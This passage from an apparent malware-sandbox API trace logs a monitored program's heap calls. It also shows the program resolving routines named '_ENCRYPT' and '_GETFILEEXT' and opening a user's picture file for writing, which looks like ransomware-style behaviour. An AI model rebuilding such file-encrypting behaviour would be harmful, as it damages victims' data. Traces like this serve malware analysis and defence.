hHeap=0x8a0000) returned 1 [0190.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0190.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0190.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0190.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0190.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0190.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0190.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0190.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0190.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0190.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0190.074] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0190.074] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0190.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0190.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0190.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0190.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6e48 | out: hHeap=0x8a0000) returned 1 [0190.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0190.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0190.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0190.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0190.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0190.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0190.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0190.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0190.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0190.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0190.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0190.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0190.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0190.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0190.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0190.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0190.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0190.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0190.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0190.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0190.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0190.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0190.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0190.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0190.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0190.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0190.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0190.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0190.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0190.096] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0190.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0190.096] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0190.096] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0190.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0190.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0190.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0190.096] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0190.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0190.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0190.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0190.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b10 [0190.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0190.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0190.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0190.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0190.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0190.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0190.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd6f0 [0190.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0190.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0190.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0190.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0190.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0190.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0190.097] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0190.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0190.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0190.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0190.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0190.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0190.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0190.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0190.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0190.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0190.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0190.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0190.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0190.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0190.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0190.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0190.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0190.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0190.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0190.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0190.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0190.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0190.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0190.099] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0190.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0190.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0190.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0190.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0190.099] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0190.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0190.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0190.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bdae0 [0190.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bdae0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0190.099] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\rulw.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0190.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0190.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0190.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0190.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0190.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0190.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0190.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0190.100] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.100] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0190.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0190.100] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0190.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0190.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0190.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0190.100] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0190.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0190.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0190.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0190.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0190.101] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0190.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0190.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0190.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd918 [0190.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd918, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0190.101] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.101] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0190.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0190.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0190.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0190.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0190.101] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0190.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0190.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0190.101] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0190.101] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0190.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0190.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0190.102] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0190.102] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0190.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0190.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0190.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0190.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0190.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0190.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0190.102] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0190.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0190.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0190.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0190.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0190.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0190.102] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0190.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0190.102] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0190.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0190.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0190.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0190.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0190.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0190.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0190.103] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79a73a50, ftCreationTime.dwHighDateTime=0x1d5e3c6, ftLastAccessTime.dwLowDateTime=0x11687980, ftLastAccessTime.dwHighDateTime=0x1d5dc33, ftLastWriteTime.dwLowDateTime=0x11687980, ftLastWriteTime.dwHighDateTime=0x1d5dc33, nFileSizeHigh=0x0, nFileSizeLow=0x26c2, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="rULw.png", cAlternateFileName="")) returned 0x90add8 [0190.103] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0190.103] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0190.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0190.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0190.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0190.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0190.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0190.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0190.103] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79a73a50, ftCreationTime.dwHighDateTime=0x1d5e3c6, ftLastAccessTime.dwLowDateTime=0x11687980, ftLastAccessTime.dwHighDateTime=0x1d5dc33, ftLastWriteTime.dwLowDateTime=0x11687980, ftLastWriteTime.dwHighDateTime=0x1d5dc33, nFileSizeHigh=0x0, nFileSizeLow=0x26c2, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="rULw.png", cAlternateFileName="")) returned 0x90add8 [0190.104] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0190.104] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0190.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0190.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0190.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0190.104] RtlAllocateHeap 